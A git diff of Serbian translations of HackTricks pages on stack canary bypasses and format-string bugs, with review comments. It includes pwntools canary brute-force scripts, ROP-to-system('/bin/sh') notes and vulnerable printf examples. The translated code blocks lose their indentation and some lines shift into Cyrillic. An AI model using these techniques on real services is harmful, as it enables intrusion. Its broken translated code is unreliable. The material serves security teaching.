kakvo prelivanje ne uzrokuje štetu, jer omogućava poređenje između sačuvanih i stvarnih adresa povratka kako bi se otkrile pojave prelivanja. Pored toga, StackShield može proveriti adresu povratka u odnosu na graničnu vrednost kako bi otkrio da li **EIP** pokazuje izvan očekivanog prostora podataka. 
Međutim, ova zaštita se može zaobići tehnikama kao što su Return-to-libc, ROP (Return-Oriented Programming), ili ret2ret, što ukazuje da StackShield takođe ne štiti lokalne promenljive. ## **Stack Smash Protector (ProPolice) `-fstack-protector`:** -This mechanism places a **canary** before the **EBP**, and reorganizes local variables to position buffers at higher memory addresses, preventing them from overwriting other variables. It also securely copies arguments passed on the stack above local variables and uses these copies as arguments. However, it does not protect arrays with fewer than 8 elements or buffers within a user's structure. +Ovaj mehanizam postavlja **canary** pre **EBP**, i reorganizuje lokalne promenljive kako bi pozicionirao bafer na višim adresama memorije, sprečavajući ih da prepisuju druge promenljive. Takođe sigurno kopira argumente prosleđene na steku iznad lokalnih promenljivih i koristi te kopije kao argumente. Međutim, ne štiti nizove sa manje od 8 elemenata ili baferima unutar korisničke strukture. -The **canary** is a random number derived from `/dev/urandom` or a default value of `0xff0a0000`. It is stored in **TLS (Thread Local Storage)**, allowing shared memory spaces across threads to have thread-specific global or static variables. These variables are initially copied from the parent process, and child processes can alter their data without affecting the parent or siblings. Nevertheless, if a **`fork()` is used without creating a new canary, all processes (parent and children) share the same canary**, making it vulnerable. On the **i386** architecture, the canary is stored at `gs:0x14`, and on **x86_64**, at `fs:0x28`. +**Canary** je nasumičan broj dobijen iz `/dev/urandom` ili podrazumevana vrednost `0xff0a0000`. Čuva se u **TLS (Thread Local Storage)**, omogućavajući deljenje memorijskih prostora između niti sa globalnim ili statičkim promenljivim specifičnim za nit. 
Ove promenljive se inicijalno kopiraju iz roditeljskog procesa, a dečiji procesi mogu menjati svoje podatke bez uticaja na roditelja ili braću i sestre. Ipak, ako se **`fork()` koristi bez kreiranja novog canary-a, svi procesi (roditelj i deca) dele isti canary**, što ga čini ranjivim. Na **i386** arhitekturi, canary se čuva na `gs:0x14`, a na **x86_64**, na `fs:0x28`. -This local protection identifies functions with buffers vulnerable to attacks and injects code at the start of these functions to place the canary, and at the end to verify its integrity. +Ova lokalna zaštita identifikuje funkcije sa baferima ranjivim na napade i injektuje kod na početku ovih funkcija kako bi postavio canary, i na kraju da proveri njegovu integritet. -When a web server uses `fork()`, it enables a brute-force attack to guess the canary byte by byte. However, using `execve()` after `fork()` overwrites the memory space, negating the attack. `vfork()` allows the child process to execute without duplication until it attempts to write, at which point a duplicate is created, offering a different approach to process creation and memory handling. +Kada web server koristi `fork()`, omogućava napad silom da pogodi canary bajt po bajt. Međutim, korišćenje `execve()` nakon `fork()` prepisuje memorijski prostor, poništavajući napad. `vfork()` omogućava dečijem procesu da izvrši bez dupliciranja dok ne pokuša da piše, u tom trenutku se kreira duplikat, nudeći drugačiji pristup kreaciji procesa i upravljanju memorijom. -### Lengths +### Dužine -In `x64` binaries, the canary cookie is an **`0x8`** byte qword. The **first seven bytes are random** and the last byte is a **null byte.** +U `x64` binarnim datotekama, canary cookie je **`0x8`** bajt qword. **Prvih sedam bajtova su nasumični** i poslednji bajt je **null bajt.** -In `x86` binaries, the canary cookie is a **`0x4`** byte dword. 
The f**irst three bytes are random** and the last byte is a **null byte.** +U `x86` binarnim datotekama, canary cookie je **`0x4`** bajt dword. **Prva tri bajta su nasumična** i poslednji bajt je **null bajt.** > [!CAUTION] -> The least significant byte of both canaries is a null byte because it'll be the first in the stack coming from lower addresses and therefore **functions that read strings will stop before reading it**. +> Najmanji značajan bajt oba canary-a je null bajt jer će biti prvi na steku dolazeći iz nižih adresa i stoga **funkcije koje čitaju stringove će stati pre nego što ga pročitaju**. ## Bypasses -**Leaking the canary** and then overwriting it (e.g. buffer overflow) with its own value. +**Curiti canary** i zatim ga prepisati (npr. buffer overflow) sa sopstvenom vrednošću. -- If the **canary is forked in child processes** it might be possible to **brute-force** it one byte at a time: +- Ako je **canary fork-ovan u dečijim procesima** može biti moguće da se **brute-force** jedan bajt po jedan: {{#ref}} bf-forked-stack-canaries.md {{#endref}} -- If there is some interesting **leak or arbitrary read vulnerability** in the binary it might be possible to leak it: +- Ako postoji neka zanimljiva **curenje ili ranjivost u čitanju** u binarnoj datoteci može biti moguće da se curi: {{#ref}} print-stack-canary.md {{#endref}} -- **Overwriting stack stored pointers** +- **Prepisivanje pokazivača sa steka** -The stack vulnerable to a stack overflow might **contain addresses to strings or functions that can be overwritten** in order to exploit the vulnerability without needing to reach the stack canary. Check: +Stek ranjiv na stack overflow može **sadržati adrese do stringova ili funkcija koje mogu biti prepisane** kako bi se iskoristila ranjivost bez potrebe da se dođe do canary-a. 
Proverite: {{#ref}} ../../stack-overflow/pointer-redirecting.md {{#endref}} -- **Modifying both master and thread canary** +- **Modifikovanje i master i thread canary** -A buffer **overflow in a threaded function** protected with canary can be used to **modify the master canary of the thread**. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified). +Buffer **overflow u funkciji sa nitima** zaštićenoj canary-em može se koristiti za **modifikovanje master canary-a niti**. Kao rezultat, mitigacija je beskorisna jer se provera koristi sa dva canary-a koja su ista (iako modifikovana). -Moreover, a buffer **overflow in a threaded function** protected with canary could be used to **modify the master canary stored in the TLS**. This is because, it might be possible to reach the memory position where the TLS is stored (and therefore, the canary) via a **bof in the stack** of a thread.\ -As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).\ -This attack is performed in the writeup: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) +Pored toga, buffer **overflow u funkciji sa nitima** zaštićenoj canary-em može se koristiti za **modifikovanje master canary-a sačuvanog u TLS**. 
To je zato što, može biti moguće doći do memorijske pozicije gde je TLS sačuvan (i stoga, canary) putem **bof-a na steku** niti.\ +Kao rezultat, mitigacija je beskorisna jer se provera koristi sa dva canary-a koja su ista (iako modifikovana).\ +Ovaj napad je izveden u pisanju: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) -Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) which mentions that usually the **TLS** is stored by **`mmap`** and when a **stack** of **thread** is created it's also generated by `mmap` according to this, which might allow the overflow as shown in the previous writeup. +Proverite takođe prezentaciju [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) koja pominje da se obično **TLS** čuva putem **`mmap`** i kada se **steck** **niti** kreira takođe se generiše putem `mmap`, što može omogućiti prelivanje kao što je prikazano u prethodnom pisanju. -- **Modify the GOT entry of `__stack_chk_fail`** +- **Modifikujte GOT unos `__stack_chk_fail`** -If the binary has Partial RELRO, then you can use an arbitrary write to modify the **GOT entry of `__stack_chk_fail`** to be a dummy function that does not block the program if the canary gets modified. +Ako binarna datoteka ima Partial RELRO, onda možete koristiti proizvoljno pisanje da modifikujete **GOT unos `__stack_chk_fail`** da bude dummy funkcija koja ne blokira program ako se canary modifikuje. 
-This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/) +Ovaj napad je izveden u pisanju: [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/) -## References +## Reference - [https://guyinatuxedo.github.io/7.1-mitigation_canary/index.html](https://guyinatuxedo.github.io/7.1-mitigation_canary/index.html) - [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md index 89eee29ec..d09ac1b35 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md 
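Review bot: the `+` lines of the stack-canaries/README.md hunk render "writeup" as "pisanje" three times ("Ovaj napad je izveden u pisanju", "u prethodnom pisanju"), which in Serbian reads as "in writing", while the same two sentences in the Threads section of bf-forked-stack-canaries.md later in this patch use "izveštaju"; settle on one term (e.g. "u ovom writeup-u" or "u izveštaju") for both files. Other wording in the same hunk: "**Curiti canary**" for "Leaking the canary" should be "**Otkriti (leak-ovati) canary**", since "curiti" is what a liquid does; "neka zanimljiva **curenje ili ranjivost u čitanju**" drops "arbitrary" and does not agree in gender with "curenje", so "neko zanimljivo **curenje ili ranjivost proizvoljnog čitanja**"; "**steck**" in the slideshare sentence is a typo for "stek"; and "proveri njegovu integritet" should be "njegov integritet". The canary term is "canary" in this file but "kanar/kanara" in bf-forked-stack-canaries.md and "kanarij" in print-stack-canary.md; one spelling across the three files would help readers searching the translated corpus. Not introduced by this patch, but since the line is being rewritten: the `vfork()` sentence ("dok ne pokuša da piše, u tom trenutku se kreira duplikat") describes copy-on-write `fork()`; with `vfork()` the child runs in the parent's address space with the parent suspended until the child calls `execve()` or `_exit()`, and no copy is made on write.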
@@ -2,55 +2,54 @@ {{#include ../../../banners/hacktricks-training.md}} -**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** +**Ako se suočavate sa binarnim fajlom zaštićenim kanarom i PIE (Position Independent Executable), verovatno treba da pronađete način da ih zaobiđete.** ![](<../../../images/image (865).png>) > [!NOTE] -> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ -> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. +> Imajte na umu da **`checksec`** možda neće otkriti da je binarni fajl zaštićen kanarom ako je statički kompajliran i nije u stanju da identifikuje funkciju.\ +> Međutim, možete to ručno primetiti ako otkrijete da je vrednost sačuvana na steku na početku poziva funkcije i da se ova vrednost proverava pre izlaska. ## Brute force Canary -The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**. +Najbolji način da se zaobiđe jednostavna kanara je ako je binarni fajl program **koji fork-uje dečije procese svaki put kada uspostavite novu vezu** s njim (mrežna usluga), jer svaki put kada se povežete s njim **biće korišćen isti kanar**. -Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. 
In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**): +Tada je najbolji način da se zaobiđe kanar jednostavno **brute-force-ovati ga karakter po karakter**, i možete da utvrdite da li je pogodjena bajt kanara bila tačna proverom da li je program pao ili nastavlja svoj redovni tok. U ovom primeru funkcija **brute-force-uje 8 Bytes kanar (x64)** i razlikuje između tačno pogodjenog bajta i lošeg bajta samo **proveravajući** da li je **odgovor** poslat nazad od strane servera (drugi način u **drugoj situaciji** mogao bi biti korišćenje **try/except**): -### Example 1 - -This example is implemented for 64bits but could be easily implemented for 32 bits. +### Primer 1 +Ovaj primer je implementiran za 64 bita, ali bi mogao lako da se implementira i za 32 bita. ```python from pwn import * def connect(): - r = remote("localhost", 8788) +r = remote("localhost", 8788) def get_bf(base): - canary = "" - guess = 0x0 - base += canary +canary = "" +guess = 0x0 +base += canary - while len(canary) < 8: - while guess != 0xff: - r = connect() +while len(canary) < 8: +while guess != 0xff: +r = connect() - r.recvuntil("Username: ") - r.send(base + chr(guess)) +r.recvuntil("Username: ") +r.send(base + chr(guess)) - if "SOME OUTPUT" in r.clean(): - print "Guessed correct byte:", format(guess, '02x') - canary += chr(guess) - base += chr(guess) - guess = 0x0 - r.close() - break - else: - guess += 1 - r.close() +if "SOME OUTPUT" in r.clean(): +print "Guessed correct byte:", format(guess, '02x') +canary += chr(guess) +base += chr(guess) +guess = 0x0 +r.close() +break +else: +guess += 1 +r.close() - print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) - return base +print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) +return base canary_offset = 
1176 base = "A" * canary_offset 
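Review bot: the `+` lines of this hunk drop the leading indentation inside the ```python block, so `def connect():` is followed by `+r = remote("localhost", 8788)` at column 0 and `while len(canary) < 8:` by `+while guess != 0xff:`; since Python's block structure is the whitespace, the translated example is no longer valid code (an IndentationError on the first line after each `def`, `while` and `if`). The `-` lines show the original four-space indentation; the translation should change only the prose lines and leave the code block bytes as they were. While in this block: the removed and re-added `connect()` never returns `r`, so `r = connect()` in `get_bf` assigns `None`; adding `return r` would make the example actually runnable.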
@@ -58,43 +57,41 @@ print("Brute-Forcing canary") base_canary = get_bf(base) #Get yunk data + canary CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary ``` +### Primer 2 -### Example 2 - -This is implemented for 32 bits, but this could be easily changed to 64bits.\ -Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload. - +Ovo je implementirano za 32 bita, ali se to može lako promeniti na 64 bita.\ +Takođe, imajte na umu da je za ovaj primer **program očekivao prvo bajt koji označava veličinu ulaza** i payload. ```python from pwn import * # Here is the function to brute force the canary def breakCanary(): - known_canary = b"" - test_canary = 0x0 - len_bytes_to_read = 0x21 +known_canary = b"" +test_canary = 0x0 +len_bytes_to_read = 0x21 - for j in range(0, 4): - # Iterate up to 0xff times to brute force all posible values for byte - for test_canary in range(0xff): - print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") +for j in range(0, 4): +# Iterate up to 0xff times to brute force all posible values for byte +for test_canary in range(0xff): +print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") - # Send the current input size - target.send(len_bytes_to_read.to_bytes(1, "little")) +# Send the current input size +target.send(len_bytes_to_read.to_bytes(1, "little")) - # Send this iterations canary - target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) +# Send this iterations canary +target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) - # Scan in the output, determine if we have a correct value - output = target.recvuntil(b"exit.") - if b"YUM" in output: - # If we have a correct value, record the canary value, reset the canary value, and move on - print(" - next byte is: " + hex(test_canary)) - known_canary = known_canary + test_canary.to_bytes(1, "little") - len_bytes_to_read += 1 - 
break +# Scan in the output, determine if we have a correct value +output = target.recvuntil(b"exit.") +if b"YUM" in output: +# If we have a correct value, record the canary value, reset the canary value, and move on +print(" - next byte is: " + hex(test_canary)) +known_canary = known_canary + test_canary.to_bytes(1, "little") +len_bytes_to_read += 1 +break - # Return the canary - return known_canary +# Return the canary +return known_canary # Start the target process target = process('./feedme') 
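Review bot: the same indentation loss as in the previous hunk, in the second ```python block: the `+` lines put the bodies of `def breakCanary():`, `for j in range(0, 4):` and the nested `for test_canary in range(0xff):` all at column 0, so the two loops and the `if b"YUM" in output:` branch can no longer be told apart and the file will not parse; restore the whitespace from the `-` lines and change only the prose ("### Primer 2", "Ovo je implementirano za 32 bita...").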
@@ -104,18 +101,17 @@ target = process('./feedme') canary = breakCanary() log.info(f"The canary is: {canary}") ``` - ## Threads -Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-forc**e a canary if the binary spawns a new thread every time an attack happens. +Threadovi istog procesa će takođe **deliti isti canary token**, stoga će biti moguće **brute-forc**ati canary ako binarni program pokreće novu nit svaki put kada se dogodi napad. -Moreover, a buffer **overflow in a threaded function** protected with canary could be used to **modify the master canary stored in the TLS**. This is because, it might be possible to reach the memory position where the TLS is stored (and therefore, the canary) via a **bof in the stack** of a thread.\ -As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).\ -This attack is performed in the writeup: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) +Štaviše, **buffer overflow u funkciji sa nitima** zaštićenoj canary-jem mogao bi se koristiti za **modifikaciju glavnog canary-ja koji se čuva u TLS-u**. 
To je zato što bi moglo biti moguće doći do memorijske pozicije gde se TLS čuva (i stoga, canary) putem **bof-a u steku** niti.\ +Kao rezultat, mitigacija je beskorisna jer se provera koristi sa dva canary-ja koja su ista (iako modifikovana).\ +Ovaj napad je izveden u izveštaju: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) -Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) which mentions that usually the **TLS** is stored by **`mmap`** and when a **stack** of **thread** is created it's also generated by `mmap` according to this, which might allow the overflow as shown in the previous writeup. +Pogledajte takođe prezentaciju [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) koja pominje da se obično **TLS** čuva putem **`mmap`** i kada se kreira **stack** **niti** takođe se generiše putem `mmap`, što može omogućiti overflow kao što je prikazano u prethodnom izveštaju. ## Other examples & references - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html) - - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there. +- 64 bita, bez PIE, nx, BF canary, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo. diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index e4d3eed44..f279256d9 100644 
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md 
@@ -2,32 +2,32 @@ {{#include ../../../banners/hacktricks-training.md}} -## Enlarge printed stack +## Uvećaj štampanu stog -Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**. +Zamislite situaciju u kojoj **program ranjiv** na prelivanje stoga može izvršiti **puts** funkciju **koja pokazuje** na **deo** **prelivanja stoga**. Napadač zna da je **prvi bajt kanarija null bajt** (`\x00`) i da su ostali bajtovi kanarija **nasumični**. Tada, napadač može kreirati prelivanje koje **prepisuje stog sve do prvog bajta kanarija**. -Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte). +Zatim, napadač **poziva puts funkcionalnost** na sredini payload-a koja će **odštampati ceo kanarij** (osim prvog null bajta). -With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session). +Sa ovom informacijom, napadač može **izraditi i poslati novi napad** znajući kanarij (u istoj sesiji programa). -Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**. +Očigledno, ova taktika je veoma **ograničena** jer napadač mora biti u mogućnosti da **odštampa** **sadržaj** svog **payload-a** da bi **ekstrahovao** **kanarij** i zatim biti u mogućnosti da kreira novi payload (u **istoј sesiji programa**) i **pošalje** **pravi buffer overflow**. 
-**CTF examples:** +**CTF primeri:** - [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) - - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')` +- 64 bita, ASLR omogućeno, ali bez PIE, prvi korak je popuniti prelivanje do bajta 0x00 kanarija da bi se zatim pozvao puts i iscurio. Sa kanarijem se kreira ROP gadget za pozivanje puts da bi se iscurila adresa puts iz GOT-a i ROP gadget za pozivanje `system('/bin/sh')` - [**https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html**](https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html) - - 32 bit, ARM, no relro, canary, nx, no pie. Overflow with a call to puts on it to leak the canary + ret2lib calling `system` with a ROP chain to pop r0 (arg `/bin/sh`) and pc (address of system) +- 32 bita, ARM, bez relro, kanarij, nx, bez pie. Prelivanje sa pozivom na puts da bi se iscurio kanarij + ret2lib pozivajući `system` sa ROP lancem za pop r0 (arg `/bin/sh`) i pc (adresa sistema) -## Arbitrary Read +## Arbitrarni Čitanje -With an **arbitrary read** like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in: +Sa **arbitrarnim čitanjem** poput onog koji pružaju formatne **nizove** može biti moguće iscuriti kanarij. 
Pogledajte ovaj primer: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) i možete pročitati o zloupotrebi formatnih nizova za čitanje arbitrarnim memorijskim adresama u: {{#ref}} ../../format-strings/ {{#endref}} - [https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html](https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html) - - This challenge abuses in a very simple way a format string to read the canary from the stack +- Ova izazov zloupotrebljava na veoma jednostavan način formatni niz za čitanje kanarija sa stoga {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-exploiting-problems.md b/src/binary-exploitation/common-exploiting-problems.md index 1aaf06372..10d45260b 100644 --- a/src/binary-exploitation/common-exploiting-problems.md +++ b/src/binary-exploitation/common-exploiting-problems.md 
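Review bot: in the print-stack-canary.md hunk the word "istoј" in "(u **istoј sesiji programa**)" is spelled with a Cyrillic "ј" (U+0458) inside an otherwise Latin-script file; it will not match a search for "istoj" and should be the Latin letter. Other points in the same hunk: "## Uvećaj štampanu stog" does not agree in gender ("štampani stog"), and this file says "stog" where stack-canaries/README.md says "stek"; "## Arbitrarni Čitanje" should be "## Proizvoljno čitanje", which is also the heading the format-strings/README.md hunk uses for the same concept; "Ova izazov" should be "Ovaj izazov"; and "(adresa sistema)" translates the identifier `system` as a common noun, where the `-` line ("address of system") means the address of the `system` function.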
@@ -1,15 +1,14 @@ -# Common Exploiting Problems +# Uobičajeni Problemi Eksploatacije {{#include ../banners/hacktricks-training.md}} -## FDs in Remote Exploitation +## FDs u Daljinskoj Eksploataciji -When sending an exploit to a remote server that calls **`system('/bin/sh')`** for example, this will be executed in the server process ofc, and `/bin/sh` will expect input from stdin (FD: `0`) and will print the output in stdout and stderr (FDs `1` and `2`). So the attacker won't be able to interact with the shell. +Kada se šalje eksploatacija na daljinski server koji poziva **`system('/bin/sh')`**, to će se izvršiti u procesu servera, i `/bin/sh` će očekivati ulaz sa stdin (FD: `0`) i će ispisivati izlaz na stdout i stderr (FD-ovi `1` i `2`). Tako da napadač neće moći da interaguje sa shell-om. -A way to fix this is to suppose that when the server started it created the **FD number `3`** (for listening) and that then, your connection is going to be in the **FD number `4`**. Therefore, it's possible to use the syscall **`dup2`** to duplicate the stdin (FD 0) and the stdout (FD 1) in the FD 4 (the one of the connection of the attacker) so it'll make feasible to contact the shell once it's executed. - -[**Exploit example from here**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit): +Jedan način da se to reši je da se pretpostavi da kada je server pokrenut, stvorio je **FD broj `3`** (za slušanje) i da će vaša veza biti u **FD broju `4`**. Stoga, moguće je koristiti sistemski poziv **`dup2`** da se duplira stdin (FD 0) i stdout (FD 1) u FD 4 (onaj od veze napadača) kako bi se omogućila komunikacija sa shell-om kada se izvrši. +[**Primer eksploatacije odavde**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit): ```python from pwn import * 
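Review bot: "exploit" is translated as "eksploatacija" in this hunk ("Kada se šalje eksploatacija na daljinski server", "Primer eksploatacije odavde"), which names the activity rather than the payload being sent; the next hunk of the same file uses "eksploita", so "Kada se šalje eksploit" / "Primer eksploita odavde" would keep the file consistent. Also "i će ispisivati izlaz" reads better as "i ispisivaće izlaz", since the enclitic "će" should not follow the conjunction directly.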
@@ -26,13 +25,12 @@ p.sendline(rop.chain()) p.recvuntil('Thanks!\x00') p.interactive() ``` - ## Socat & pty -Note that socat already transfers **`stdin`** and **`stdout`** to the socket. However, the `pty` mode **include DELETE characters**. So, if you send a `\x7f` ( `DELETE` -)it will **delete the previous character** of your exploit. +Napomena da socat već prenosi **`stdin`** i **`stdout`** na soket. Međutim, `pty` režim **uključuje DELETE karaktere**. Dakle, ako pošaljete `\x7f` ( `DELETE` -) to će **obrisati prethodni karakter** vašeg eksploita. -In order to bypass this the **escape character `\x16` must be prepended to any `\x7f` sent.** +Da biste to zaobišli, **karakter za bekstvo `\x16` mora biti prethodjen bilo kojem `\x7f` koji se šalje.** -**Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.** +**Ovde možete** [**pronaći primer ovog ponašanja**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.** {{#include ../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 3d7bfa018..8d318f222 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -2,22 +2,16 @@ {{#include ../../banners/hacktricks-training.md}} -
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +## Osnovne Informacije -{% embed url="https://www.stmcyber.com/careers" %} +U C **`printf`** je funkcija koja se može koristiti za **štampanje** nekog stringa. **Prvi parametar** koji ova funkcija očekuje je **sirovi tekst sa formatima**. **Sledeći parametri** koji se očekuju su **vrednosti** za **zamenu** **formata** iz sirovog teksta. -## Basic Information +Druge ranjive funkcije su **`sprintf()`** i **`fprintf()`**. -In C **`printf`** is a function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text. - -Other vulnerable functions are **`sprintf()`** and **`fprintf()`**. - -The vulnerability appears when an **attacker text is used as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to read and **write any data in any address (readable/writable)**. Being able this way to **execute arbitrary code**. - -#### Formatters: +Ranjivost se pojavljuje kada se **tekst napadača koristi kao prvi argument** ovoj funkciji. Napadač će moći da kreira **poseban unos koji zloupotrebljava** **printf format** string mogućnosti da čita i **piše bilo koje podatke na bilo kojoj adresi (čitljivo/pisivo)**. Na ovaj način će moći da **izvrši proizvoljan kod**. +#### Formati: ```bash %08x —> 8 hex bytes %d —> Entire 
@@ -28,72 +22,58 @@ The vulnerability appears when an **attacker text is used as the first argument* %hn —> Occupies 2 bytes instead of 4 $X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3 ``` +**Primeri:** -**Examples:** - -- Vulnerable example: - +- Ranjivi primer: ```c char buffer[30]; gets(buffer); // Dangerous: takes user input without restrictions. printf(buffer); // If buffer contains "%x", it reads from the stack. ``` - -- Normal Use: - +- Normalna upotreba: ```c int value = 1205; printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5 ``` - -- With Missing Arguments: - +- Sa nedostajućim argumentima: ```c printf("%x %x %x", value); // Unexpected output: reads random values from the stack. ``` - -- fprintf vulnerable: - +- fprintf ranjiv: ```c #include int main(int argc, char *argv[]) { - char *user_input; - user_input = argv[1]; - FILE *output_file = fopen("output.txt", "w"); - fprintf(output_file, user_input); // The user input can include formatters! - fclose(output_file); - return 0; +char *user_input; +user_input = argv[1]; +FILE *output_file = fopen("output.txt", "w"); +fprintf(output_file, user_input); // The user input can include formatters! +fclose(output_file); +return 0; } ``` +### **Pristupanje Pokazivačima** -### **Accessing Pointers** - -The format **`%$x`**, where `n` is a number, allows to indicate to printf to select the n parameter (from the stack). So if you want to read the 4th param from the stack using printf you could do: - +Format **`%$x`**, gde je `n` broj, omogućava da se printf-u naznači da izabere n-ti parametar (sa steka). Dakle, ako želite da pročitate 4. parametar sa steka koristeći printf, mogli biste to uraditi: ```c printf("%x %x %x %x") ``` +и могли бисте читати од првог до четвртог параметра. -and you would read from the first to the forth param. - -Or you could do: - +Или бисте могли да урадите: ```c printf("%4$x") ``` +i direktno pročitajte četvrti. -and read directly the forth. 
